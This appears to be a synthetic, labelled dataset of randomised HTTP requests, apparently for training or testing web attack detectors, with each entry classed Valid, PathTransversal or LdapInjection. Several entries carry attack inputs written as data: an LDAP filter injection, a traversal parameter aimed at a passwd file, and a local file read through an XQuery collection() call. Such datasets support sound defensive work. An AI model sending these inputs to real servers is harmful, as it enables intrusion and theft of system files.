Via: 9.6 www.Rgron.htm, 0.6 78.32.72.150
Transfer-Encoding: Ngvlha
Upgrade: 5ck/7.3
Warning: 544 www.hni2dj.shtml:11 "OemiccOl" 
X-Forwarded-For: 240.213.181.129
X-Serial-Number: 1489164052019432947
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

o5eztsnj=nvAU@8XuL_&etdgaxdub8=s3&ohp&mk2onrclo= n4bqha&eneursnts=nit=

End - Id: 4225
Start - Id: 28935
class: Valid
GET /jCorIoaeaedotti/OE4ieFrothdznrlW/VDFLusj/dn3/kYstdinYpP/kbtsrsrGhsranEuih/ox6_Rq.606of/WlocationuR4catftp-HQ/es9dOhaNe05wflAielVu/ecE/Diweayp.gif?otoidneks=44xosX5uQ&ic=ecyirjbhsenlez&FYJNP8mochaixwH=rua&sa3e3rOcdne=EmIeurS&t01tiH7ns5rc=fKRNB&hV0G3t1ho=Epznhbn&lqjsahc4wefedOa=8322438433&shew6yagi0momh=eeChRIjx&merfdoaopae=sjr&Em=an45access_loguiert0fNdt&sestdyhttphd5b=2038 HTTP/1.0
Host: www.iull2.be
Connection: sil1hih
Accept: image/*;q=0.9
Accept-Charset: *;q=0.6
Accept-Encoding: gzip, gzip, identity;q=0.5
Accept-Language: *
Cache-Control: no-transform
Client-ip: 177.45.35.215
Cookie: 2ee=nasystem;78ntK=sN
Cookie2: $Version="5"
Date: Sat, 23 Sep 06 19:41:17 UTC
ETag: W/"r_14kZZVNED_XR.CY"
Expect: r9naTT0=pihtop;7hcs
From: iItoh5s@s6adT2ahhc.cz
If-Modified-Since: Tue, 07 Aug 07 19:22:36 GMT
If-Unmodified-Since: Sun, 12 Jul 09 07:44:06 CET
If-Match: "@l4THu81ImO@p_s7BNq"
If-None-Match: *
If-Range: "P_yEh8UaIk_CF-efWQ"
Max-Forwards: 4
MIME-Version: 9.9
Pragma: a379vS='ttcTs5'
Proxy-Authorization: NTLM cXV1dGNnRGR3dGFqZHN0ZW9oaDJpbGVhc2lhaWlodWFsbGVwbWpv
Authorization: eaat5s ifeAr3ca=seiu3
Range: 47-52,104931-
Referer: /f4lj.msf
TE: chunked,deflate;q=0.4
Trailer: Upgrade
User-Agent: ytmeeeic (6sxV58Pphd; mL2YS1AZ; iKd_Stfat; 4-zO9wS; n@2_JEXI)
UA-CPU: Sparc
UA-Disp: 3959,584,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 3649x0845
Via: FTP/9.0 123.62.14.98:086, FTP/7.6 www.jAiovs.shtml, 2.4 www.lRssa.htm
Transfer-Encoding: identity
Upgrade: cepwa/4.9, ofa/3.0
Warning: 849 www.nnoei.jpeg:1260 "it14qNa9s0atUtej4rn" "Sat, 10 Oct 09 18:20:14 CET"
X-Forwarded-For: 108.24.111.61
X-Serial-Number: 7931332
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28935
Start - Id: 18619
class: Valid
GET /ilIWyNqzTVjuhaGUJfqa/c61j914A67pBy_n0/BVZkcP/wfO0KxgkwpbiBmmlju./arsa3erhH/vH/hqiip/23p6L3xmGUDdrop./eugeQezJy33WBi0u/nbG___rCQ36zMZ5X1caC/ut0ID-J5fk5jZF3@vXC/xofrlieiFEtsion.jpg?gprocessing-instruction44YcathelHw=eb%3Aaoathttpsm&7k-L@8iXcopy3c=In&DWQ@homeboot.iniKL=889&enac3eu=rmN&rae=3321&9acee=T+ee7-a HTTP/1.0
Host: www.1ssrahi.st
Connection: keep-alive
Accept: image/*;q=0.1, application/zip;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 224.49.207.166
Cookie: cnKiraacAresu=43238683
Cookie2: $Version="38"
Date: Fri, 27 Oct 06 24:06:18 GMT
ETag: "@LZVa7ZT2QWniMH"
Expect: 100-continue
From: aAwintj@honhi.org
If-Modified-Since: Wed, 26 Jan 05 02:03:33 CET
If-Unmodified-Since: Wed, 14 Sep 05 03:30:33 GMT
If-Match: *
If-None-Match: "vvo7UrVRATxP3fzyh.dW"
If-Range: Mon, 15 Feb 10 13:42:01 GMT
Max-Forwards: 0
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: NTLM ZW5zRUVud2VuaWRsb25NM2N0aWlVaGllY2FkYXRlbjBj
Authorization: Vreca tneo=ttcet
Range: -0
Referer: /anwm/ptaoo5/thmnp2/U0te2nIe.cgi
TE: gzip,deflate;q=0.5,chunked;q=0.3
Trailer: Pragma
User-Agent: cpn4W0LMC0 http://www.rradhle.com
UA-CPU: 68000
UA-Disp: 1268,0056,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 7882x967
Via: reh/8.8 0.21.111.57:58983, HTTP/7.9 73.195.133.226, FTP/0.1 5.94.74.243
Transfer-Encoding: deflate
Upgrade: ndniu/9.9, rsSssn/8.8, bry2/5.0, aEnc/1.0
Warning: 858 www.lwelElt3.png "1bxSreEt8b" "Fri, 04 Jun 04 02:26:38 UTC"
X-Forwarded-For: 72.228.20.6
X-Serial-Number: 41593026
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 18619
Start - Id: 44733
class: PathTransversal
GET /d.5LvVk7/UEeval29jTf_/oy5orqolltjmnsnElo.dll?sqnnsurbzoo=a%27ibt&3hn4vteeez=toeb&aie0=7ieuymebs&aia6h7tta=collection%28+++++file%3A%2F%2F%2Fc%3A%2Fig%2Fdwnt1.xml%29 HTTP/1.1
Host: www.tnsupr.de
Connection: close
Accept: text/plain;q=0.7, video/*;q=0.4
Accept-Charset: x-mac-korean;q=0.3, iso-2022-jp;q=0.5, x-mac-ce;q=0.9, hz-gb-2312, x-mac-korean;q=0.7
Accept-Encoding: gzip;q=0.2
Accept-Language: Rmen-sy8mweoy, ufeeemn0-nenls, y-terph;q=0.5, ezaraSar-pldgdeer, teohtsco-aaenb8;q=0.8
Cache-Control: no-store
Client-ip: 67.198.26.106
Cookie: yswjvo=gZgi7;wclYsnyeeyqreo=i1rtn
Cookie2: $Version="76"
Date: Mon, 24 Apr 06 06:45:39 UTC
ETag: "cagFw8bM.KdYd@fBxbEm"
Expect: 100-continue
From: p3teud@syl6D.biz
If-Modified-Since: Sat, 29 Dec 07 01:09:44 GMT
If-Unmodified-Since: Sat, 21 Jan 06 13:28:47 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 09 May 04 05:26:54 CET
Max-Forwards: 743
Pragma: aodh8tp=gtgsarh
Authorization: agoxte eiinhrh=oipd
Range: 218-,38304-
Referer: /eDm7e.wmn
Trailer: TE
User-Agent: lmedrhe
UA-CPU: MIPS
Via: FTP/0.1 www.odlMt.js, FTP/2.4 108.109.61.74, HTTP/0.6 5.58.30.194
Transfer-Encoding: identity
Upgrade: y9uo/8.1, 6tTo/8.6, sd1ve/9.7, OmipFw/5.0, Xew/1.5
Warning: 438 www.rsk9th.shtml "do9iaoemswqhy" 
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44733
Start - Id: 6571
class: Valid
PUT /ie1ni5ssfmwcslEtsth/tiCEalij6Deat/0B2Lry.E/wTqZihQawVoLgiWB/5pit3htomp/4yiWVVivV3bvDvSHdSyW/iu2B.zFpDhqP/yq_6h.TZv96Slj/8T5r_pvGt4EZ.js? HTTP/1.0
Content-Length: 101
Content-Language: 3oo,iej3sot
Content-Encoding: gzip
Content-Location: http://AsRwTb.it/andEs/rcyrltje/t5teizne/imjst.mpg
Content-MD5: dWxudHVydnIyMjMwbWVoVQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 05 Mar 04 23:54:18 GMT
Last-Modified: Thu, 09 Feb 06 17:14:45 GMT
Host: www.aI8ceio.cz
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-hebrew
Accept-Encoding: 
Accept-Language: oi-s3gnttsc;q=0.3
Cache-Control: max-age=75
Client-ip: 64.41.220.78
Cookie: oefr9aerFzgttal=st_RnCtxQvgf;9gferhtwii=76;gseOI6s0b8=yC.UOO;tahb45psi=t81W6PZy;sY4v12to6opnoto=r3y
Cookie2: $Version="809"
Date: Thu, 22 Dec 05 01:18:57 GMT
ETag: "viI@pSKDL4kUvEhiJ"
Expect: whte=maaiw
From: r0ll@emEeoe.uk
If-Modified-Since: Sun, 16 Oct 05 15:11:39 UTC
If-Unmodified-Since: Tue, 25 Jul 06 08:47:58 GMT
If-Match: "tAtyYFontO.Mkk1SMoL"
If-None-Match: "NLPHsr28qLKubE-"
If-Range: Thu, 09 Dec 04 22:49:27 GMT
Max-Forwards: 778
MIME-Version: 0.1
Pragma: dfsp='nceC'
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM MmVzZWlvbHJldGNhbGxyYWl1aXNnZThpZnRrZWVubEU=
Range: -45,964658-8
Referer: http://www.iQdiveo.biz/zagtx/wcksis/doRthu/shvEm/a5te.mspx
TE: chunked;q=0.2,deflate
Trailer: Accept
User-Agent: xteiggeht9efnlgam
UA-CPU: StrongARM
UA-Disp: 7851,1243,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 2928x871
Via: FTP/0.2 www.otyntot.gif, asaCe/4.1 56.181.189.39:37, FTP/1.9 121.231.212.96:69
Transfer-Encoding: deflate
Upgrade: hrs/4.4, 8hti/3.0, anoo/5.2
Warning: 471 www.mrdd.js "xzwedabu" "Wed, 19 Apr 06 12:19:20 CET"
X-Forwarded-For: 177.82.104.120
X-Serial-Number: 552358
----: ------------------------
~~~~~: ~~~~~~~~~~~~~

zsnpv4djmS4=h9&tetHtehnehis=duetsbtpaiulurex&se3edgw9iflh=biniiqirbtelnet%5Ciexeco2l0e&8B%uh5qmyUP=23

End - Id: 6571
Start - Id: 38416
class: LdapInjection
GET /ehn10ewuhss/exyO@ngxCFtKv_D.C/ANWd/dJ/nwenss.js?r8iiji=ebz&lhR=t%2Faxhi8divr1ls%3A+%5Ccceval&hSo7atredU=etlTdgto&h0htjeOz=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&Pc0dtTda=sd6ruaba6g3i&3ecehOdlWnCsver=2914746 HTTP/1.0
Host: 84.82.29.147
Connection: tnez
Accept: audio/x-wav;q=0.4
Accept-Charset: windows-874
Accept-Encoding: *
Accept-Language: slh-hhey;q=0.8, afos2a-ac7, sEtteRnt-idu;q=0.6, eme-s9wd
Cache-Control: max-age=6
Client-ip: 206.10.185.166
Cookie: miiu1ealeehl=rFrecrp;afi=cchildi77ili;nPolBhS=e9sAhr;Ireplace-WgxmlhttpF_=82068;iheos=ot ;GSdJnevalsc=nSal
Cookie2: $Version="561"
Date: Wed, 09 Feb 05 10:51:46 CET
ETag: "FIXQK-2mPeNeJFMjfxH"
Expect: 100-continue
From: r8urdpH@atna.uk
If-Modified-Since: Wed, 21 Jan 09 05:13:47 GMT
If-Unmodified-Since: Wed, 01 Aug 07 10:34:23 UTC
If-Match: "uHDclq5lEGLx96YOP"
If-None-Match: "NqZdmVjfMA5II.S"
If-Range: "tSZRnmZauSU55Gkw"
Max-Forwards: 7087
MIME-Version: 0.1
Pragma: 0Exugas0=deoEa
Proxy-Authorization: h80n hmasNo=a0xee
Authorization: etet5O wh5tR=jadthTlY
Range: -96373
Referer: /tents/weuY0/D2svTos.bin
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: diFfIe6a http://www.ptrd.be
UA-CPU: MIPS
UA-Disp: 381,973,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 0696x1408
Via: awt/6.2 www.2zire.gif, ewy/4.5 www.elue.png:591, 2.8 www.etssecve.jpeg
Transfer-Encoding: compress
Upgrade: Elgm/6.3, hea/6.4, She/5.1, dol/2.2
Warning: 498 www.qbdd.css:76 "iEsitooO9Eeo" "Mon, 07 Mar 05 03:32:44 UTC"
X-Forwarded-For: 139.160.46.245
X-Serial-Number: 8565701730547644653
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38416
Start - Id: 4922
class: Valid
PUT /xQjtm/nMNxY1CWxVUb9WurnC/oKXo8cMK/K5tatouaentciylgeao/uiiomTalelO/itauh0gbnTleblXi/nejKne/4nn7etufhinl/yrhyoyehes8eelRr/q22f0lKowKt/anahve74aodrut8dt.bin? HTTP/1.0
Content-Length: 97
Content-Language: dlohnri6
Content-Encoding: identity
Content-Location: http://www.setOmnea.net/03siog.msf
Content-MD5: b2JwZWNhckNlaWR0QXBPZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 26 Jan 10 22:41:40 CET
Last-Modified: Thu, 09 Jun 05 19:21:11 UTC
Host: www.hdieeena.fr
Connection: close
Accept: audio/basic, video/quicktime;q=0.2, image/*
Accept-Charset: *
Accept-Encoding: deflate, gzip, compress;q=0.7, deflate;q=0.2, deflate
Accept-Language: eu-xgreo;q=0.9, Dj-Acoht
Cache-Control: no-store
Client-ip: 47.100.65.174
Cookie: R04r=93101570;mhonQr3eoeqbsk=1
Cookie2: $Version="0"
Date: Mon, 14 Jan 08 05:43:23 UTC
ETag: W/"k3ZBJlp3z6SDXMh"
Expect: pni9w
From: osuu@ioeO.org
If-Modified-Since: Mon, 31 Jul 06 02:32:43 UTC
If-Unmodified-Since: Wed, 04 Mar 09 13:33:58 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: NTLM bmFmcmV0dHR6MWdBdHB0MXVyaWVpajhrZUVpdXQ1ZWNhZGsydQ==
Authorization: Basic ZW5lamU0YTprdHg1czU=
Range: 0401-,-401,485260-5
Referer: http://t1ev.be/juhoizde.mdb
TE: trailers
Trailer: Accept-Encoding
User-Agent: anHulE4o/1.4.1.2.4
UA-CPU: 68000
UA-Disp: 979,352,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 4223x6180
Via: 8.4 184.29.158.28, HTTP/3.6 38.71.162.195
Transfer-Encoding: compress
Upgrade: dnb/4.0
Warning: 222 www.oeeeay.gif:8841 "nriml4ld" "Mon, 28 Aug 06 16:14:52 GMT"
X-Forwarded-For: 172.97.206.77
X-Serial-Number: 074898
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

CR.d4C.=032174867&Hu4Ineizoiebr=9oleesrPwErzarvlc&GGaccepttmpehttp9B3T=oa1n&rwfiofeb=oFktVwVpASAi

End - Id: 4922
Start - Id: 46312
class: PathTransversal
GET /na/tOd1/huP8QEVlN0MnullUR/e.Z-X6LLWLg2As/nt2Oc4KCOxJ8y09n_/o5cbe/ebaVhttvedt2littsn/i5GoaU0tere9ot/oatru3li/GservicesNXGDFexecZbw-.htm?q9m2hnyssyno=ht5FWdw&erosat9=146&sabengKd=0022133&snldoy2t=%2F%2C%2C%2C%2FtSeuoho%2Fzn4%2Fpasswd&heYsnt3wsa=4699&chuahlIu=219&oN=tesi+y&2gtnc5ey=179&ed=f HTTP/1.0
Host: 27.13.101.255:60
Connection: close
Accept: video/*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: rdt-h, hr-Sdrhs, porrgit-tn, 6h4nt-peotieLn;q=0.6
Cache-Control: i6toitsv=3i7e
Client-ip: 208.222.203.198
Cookie: SalhcLiesvrTc=075506;seihaabo=128;auteeaAusXnx=ey1Uqe8vqK
Cookie2: $Version="6"
Date: Thu, 08 Jan 04 21:31:15 GMT
ETag: "-GzYbTKa0ciTQ3FJ"
Expect: 100-continue
From: twei@aedq.de
If-Modified-Since: Thu, 12 Aug 04 19:35:31 GMT
If-Unmodified-Since: Thu, 08 Jan 04 12:37:16 GMT
If-Match: "Qwfa1QdWXZiU4g4U@M"
If-None-Match: *
If-Range: Mon, 11 May 09 16:02:32 CET
Max-Forwards: 67
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Digest response="c973fB96c44fD6a45864DFA7cb1fB18f"
Authorization: Digest nc=5F2E8d2F
Range: 426-9089,-721
Referer: /hOfA.mpeg
TE: trailers
Trailer: Warning
User-Agent: Mozilla/1.7 (X11; U; SunOS sun4u 6.6; rm-ha; rv:6.1.2) Gecko/81444614
UA-CPU: Sparc
UA-Disp: 0145,4311,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 434x579
Via: 2.5 66.111.4.180, tIo/8.1 114.146.227.57:61
Transfer-Encoding: gzip
Upgrade: iNrqo/0.0, 3ii6c/7.6, pN6ieo/9.3, uda/6.3
Warning: 507 www.fij6i.htm "ebesreamwt" 
X-Forwarded-For: 189.150.137.247
X-Serial-Number: 4859376671430624
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46312
Start - Id: 18209
class: Valid
GET /4te/s@YI6xzn3VKD8XL5FgL/ftlrvnEc0AyerbAdi/dspzK/uubxCSX.cgi? HTTP/1.1
Host: 139.177.90.217
Connection: 51auet
Accept: */*
Accept-Charset: windows-1253
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 18.171.181.243
Cookie: unionHzinputQL5objectvO=Ds3;bcx7pmtoe=a 9 $tzinput;msnuibv=2iIs$
Cookie2: $Version="20"
Date: Thu, 11 May 06 04:54:29 CET
ETag: W/"kbsG2wxTIYHzOzT-h"
Expect: shsz
From: oritsj@i639iid.org
If-Modified-Since: Fri, 30 Jan 04 09:20:42 GMT
If-Unmodified-Since: Fri, 11 Apr 08 04:47:54 CET
If-Match: *
If-None-Match: *
If-Range: "_NjsNoYOIFtJFpnv"
Max-Forwards: 5628
MIME-Version: 0.5
Pragma: saey='qee3ytn'
Proxy-Authorization: udkE o8jpteaz=eet8ehdn
Authorization: Basic ZWFSeGlpYjp3dHNjODg=
Range: 666465-916
Referer: /s10ttu1/Eesedn/cddte.css
TE: trailers,deflate;q=0.8
Trailer: Referer
User-Agent: ri4goeiPicupgfilre
UA-CPU: StrongARM
UA-Disp: 202,576,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 446x226
Via: 9.7 146.141.142.83:07611
Transfer-Encoding: compress
Upgrade: hicew/7.4, 1ok/5.7, 4ba/6.1, Inm/8.9, hutr/5.7
Warning: 457 249.243.123.227 "ar3gutfzh" "Thu, 05 Jul 07 12:26:34 GMT"
X-Forwarded-For: 164.38.194.242
X-Serial-Number: 8413753908190
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18209
Start - Id: 28218
class: Valid
GET /lgihei/yd5oth2EboAqtseeghrR/akx4YF@_/lzeyb/hmaplietoa0ticeBthr/NqNgb8l/eQbmPn_RFCKMesxFMww@/heG/6kBRV8r/lBg5a.asmx? HTTP/1.0
Host: www.2ttitrAet.de:84157
Connection: es2lfae
Accept: audio/x-wav, image/png;q=0.2, application/*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-age=82745
Client-ip: 178.43.207.106
Cookie: pn=53925578;eh0Rjp=a0tosystemaips %ehrll[sl
Cookie2: $Version="33"
Date: Tue, 24 May 05 06:05:35 CET
ETag: W/"zJVa9zvwC@-1K11AAgjh"
Expect: 100-continue
From: ldbonaa@rtlruedpi.uk
If-Modified-Since: Tue, 18 May 04 14:34:27 GMT
If-Unmodified-Since: Tue, 20 Jan 04 14:49:38 UTC
If-Match: *
If-None-Match: ".wkVh-3WNh9bodPG1-O"
If-Range: Fri, 02 May 08 21:45:38 CET
Max-Forwards: 545
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: Digest opaque="lesgG"
Authorization: NTLM dHNsZWFuaXBydHptZWExc2FhSW5ybm9laGdlZWRydHpvdGJzYXd0bzFhYWhk
Range: 9-215077,5-
Referer: /8abtvtay/litmsaso/t0ns8n/eDltm.txt
TE: trailers,trailers
Trailer: TE
User-Agent: enhot/3.8.1.4.5
UA-CPU: MIPS
UA-Disp: 7874,6904,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 3395x113
Via: 5.1 www.amuhrea.js:580
Transfer-Encoding: identity
Upgrade: Tsis/9.8
Warning: 776 108.16.131.195 "ielaue4Iaenoncleslf" "Mon, 18 Feb 08 07:26:55 CET"
X-Forwarded-For: 242.176.161.203
X-Serial-Number: 1882318101295
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28218
Start - Id: 6077
class: Valid
POST /acceptdKqs.Zk/iO6EYG1oO5r4F/eeiotmkieoimctDO/oorlge4/rusDcv4T1R1iV/14ZHnxfZ/eh/ni1/sdfYkKGF2drlLOn/neaofeI/naamqkTnwee0Oib5/openQJL.asp? HTTP/1.1
Content-Length: 165
Content-Language: qc,z,Asf
Content-Encoding: gzip
Content-Location: http://ihgtt.net/tnoUe/e4sT3asr/o9nw/agtuh/hhee1ol.swf
Content-MD5: a3BzYWlieHdlcjM3ZWVvZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 05 Oct 07 01:43:05 CET
Last-Modified: Fri, 21 Jan 05 01:22:26 UTC
Host: www.tada2r.ch
Connection: keep-alive
Accept: */*
Accept-Charset: koi8-r;q=0.6, iso-8859-5;q=0.7, windows-874;q=0.4, windows-874;q=0.6, windows-1252
Accept-Encoding: deflate;q=0.5
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 40.3.44.211
Cookie: t5vomscreb=a0aA27Bihsfd;AleeD=xA6ax5KN-a;Fiteo_yftpwqq= imaSnaTst1wA~l;vAseayoity8se5h=7ioehzoesdtaaoen;5qvtU8TSconnectpL=46;g3antt2lehc9=61455
Cookie2: $Version="8"
Date: Tue, 15 Nov 05 20:03:59 GMT
ETag: W/"NE3aUauoXGYsn5j1u"
Expect: dr6lr=23tXe
From: lhr3tet@wip6gnt6b.it
If-Modified-Since: Thu, 22 Mar 07 02:11:11 CET
If-Unmodified-Since: Tue, 21 Feb 06 15:35:02 UTC
If-Match: *
If-None-Match: "mfLFKd_ONFd50itzKs"
If-Range: Thu, 02 Mar 06 17:22:15 CET
Max-Forwards: 777
MIME-Version: 0.8
Pragma: SensDOas='c'
Proxy-Authorization: Digest uri=/kgj1ehet/pnldts/rwlseod/iTpt6ia/uotey0if.php
Authorization: NTLM c2k2ZXRvaTBzc3R0dWZzaWh3ZXkwOXJldERuc2ZpdDU5dG00MmV1b2FpWQ==
Range: 8100-26
Referer: /S6thb.png
TE: deflate,deflate;q=0.4,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/4.4 (Machintosh; U; PPC Mac OS X 7.0; ad-k3; rv:6.4.2) Gecko/07873928
UA-CPU: x86
UA-Disp: 381,9388,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 179x0676
Via: FTP/5.5 93.24.11.202
Transfer-Encoding: deflate
Upgrade: asOo/3.7, xilcsc/2.8, h8r/6.5, llsa/6.6
Warning: 872 4.222.14.84:89 "ieaaIaa" "Tue, 06 Dec 05 18:11:53 GMT"
X-Forwarded-For: 65.50.7.154
X-Serial-Number: 172658995199339
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Tq4hrDmcohdte=tGcHTzpeRdU&wdbresut=Hep&yetodttnmf=1904&wHrpi=tblinkennom@/nreplacesst>4a&g3rhi=p9qG-&oft6Nliyeesa2a= s&srf67t=gr3JaJi-CI&inrUppoelINyqt=q'rnd

End - Id: 6077
Start - Id: 26914
class: Valid
GET /LqMc20rV6/ex8s25/vB/4_qHqqNXBKSjc/Cjxc/tbqfpXO/0YHD_8/mUO/mfcaonC395/ui.php4?wemUrraorpe=eil&5t=2&TrisAaa=828103&abAtelnetP4BpvpZ=-Sue HTTP/1.1
Host: 178.59.78.172
Connection: keep-alive
Accept: audio/basic, video/quicktime;q=0.4
Accept-Charset: *
Accept-Encoding: deflate, deflate, gzip, gzip;q=0.3
Accept-Language: *;q=0.6
Cache-Control: min-fresh=6965
Client-ip: 187.70.10.21
Cookie: wswmsy=ikYa5oehsu r;gv.Z@sbcY=7549669335;9y65=;'o;o6nnenlcrm9suzn=yb;ikrramre=4
Cookie2: $Version="22"
Date: Wed, 09 Mar 05 12:05:37 GMT
ETag: "DXPzLEEKvZv1rVSbe4"
Expect: 100-continue
From: hivetoa@epAldB8o.biz
If-Modified-Since: Sat, 06 Jan 07 10:39:20 UTC
If-Unmodified-Since: Wed, 04 Apr 07 02:32:08 CET
If-Match: *
If-None-Match: *
If-Range: "@R.qZ8RnxhJElpJiW"
Max-Forwards: 2246
MIME-Version: 3.0
Pragma: be3='c'
Proxy-Authorization: NTLM aGFkbHRyb0RxYVRiMHQwaWV0bjY0bXNkMGg2emV0aHR0bnJTTThI
Authorization: Basic a3RoZWU4dTpzZUFqM3Rv
Range: 22051-,583244-
Referer: /seiONc/tetaehEi.rar
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/6.5 (Windows; U; WinNT 0.5; eq-el; rv:9.4.5) Gecko/41750850
UA-CPU: Sparc
UA-Disp: 1309,2505,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 838x311
Via: FTP/9.6 www.sooeeFun.htm, HTTP/6.5 75.105.222.147
Transfer-Encoding: deflate
Upgrade: h0reac/0.1
Warning: 785 139.199.253.164:9 "stduoo4mei" "Wed, 12 Dec 07 02:11:19 CET"
X-Forwarded-For: 31.91.23.195
X-Serial-Number: 781010344531
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26914
Start - Id: 8834
class: Valid
GET /aarmb1ba/o6Z6zpyFOgYZE1yMh7zt/7rMstemsDa/h9yen0qE93sco/mks/o29TwEprhk_Z4-LgEvE/ng7teRrer/ezgJa_owF4T335gzpg/aALTOKURkGO07al/znresw3ugeBrs/y0xT2OU6CM.swf?txr7ohise=se%27&iyets1t=aefrs3ooivt&yn=449&tghexm3Sge=e&mmltNlea=yphp&0hTcy9=c%25ina&eiheswd7r8XkLbo=at%40yu5ebjy8&tt3=%7E6%3A5Ek&r2=clTBozu7X8Y HTTP/1.1
Host: www.eNOuG.de
Connection: close
Accept: */*;q=0.8
Accept-Charset: iso-8859-15, utf-7, ks_c_5601-1987, ks_c_5601-1987, koi8;q=0.2
Accept-Encoding: deflate, deflate
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 34.60.153.94
Cookie: 3suvqie8afh=Aarch;ertrta6y=t
Cookie2: $Version="55"
Date: Wed, 06 Oct 04 22:09:00 CET
ETag: W/"UR3sW-PaYGURfJZ"
Expect: 100-continue
From: rdnx@ecqap.com
If-Modified-Since: Tue, 03 Mar 09 10:01:16 GMT
If-Unmodified-Since: Mon, 28 Aug 06 05:12:59 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 18 Oct 09 07:03:47 CET
Max-Forwards: 564
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: Digest cnonce="locenctt"
Authorization: Digest qop=auth
Range: 01-5579,5729-
Referer: http://www.fTietnc.ch/oagyte/odiluehk/adnotd.asp
TE: deflate;q=0.5,deflate
Trailer: Max-Forwards
User-Agent: uteaP41 http://www.snjr.gov
UA-CPU: x86
UA-Disp: 344,093,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 186x0429
Via: 4.7 129.8.209.218, 8.9 www.casagrT.gif
Transfer-Encoding: ihOs
Upgrade: ocwua/7.0, sAmh/4.1
Warning: 141 159.143.80.96 "f89ueSzcsNieiectcet" 
X-Forwarded-For: 160.159.126.87
X-Serial-Number: 28573562
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8834
Start - Id: 14334
class: Valid
GET /xp_Y5rJrVx4q4k.sh?edStpgh=etwT HTTP/1.1
Host: www.tCefxolo.it
Connection: keep-alive
Accept: image/gif;q=0.3
Accept-Charset: utf-8, ks_c_5601-1987
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 62.65.141.139
Cookie: g1MRcv1=oTM0r6dGQJpg;eval1jmMxXuP=pranstQceE3srho;1e6ttsrkh=Tenwwuoulnii3ei;cQprllzi3deuait=rhsdeany
Cookie2: $Version="48"
Date: Thu, 14 Dec 06 11:19:01 CET
ETag: W/"WxFpJ8ctmwuCHKC"
Expect: 100-continue
From: is8t@neuelhlk.be
If-Modified-Since: Thu, 26 Jan 06 19:54:03 GMT
If-Unmodified-Since: Fri, 03 Apr 09 02:17:50 GMT
If-Match: "D7cAcIacDri62UPMSXP"
If-None-Match: *
If-Range: Mon, 08 Feb 10 14:00:41 GMT
Max-Forwards: 3
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: NTLM dXRFY1NlYXJlc290b25lcmFmbWhvc3VicmF1dWxoc2VpaGllcndtaXNhYzA=
Authorization: Basic dG40YTkyaDphUGV3dG1p
Range: 938-
Referer: http://viiehu.org/mnEo/t3kih6a.sh
TE: gzip,trailers
Trailer: Upgrade
User-Agent: Mozilla/8.1 (X11; U; Solaris 1.4; qo-PN; rv:0.1.1) Gecko/01140765
UA-CPU: MIPS
UA-Disp: 5219,163,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 2649x359
Via: 4.6 99.59.219.145
Transfer-Encoding: compress
Upgrade: 9sii2/1.4
Warning: 869 www.s98uEo.css "er1dzcr" 
X-Forwarded-For: 86.196.76.2
X-Serial-Number: 04884664
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14334
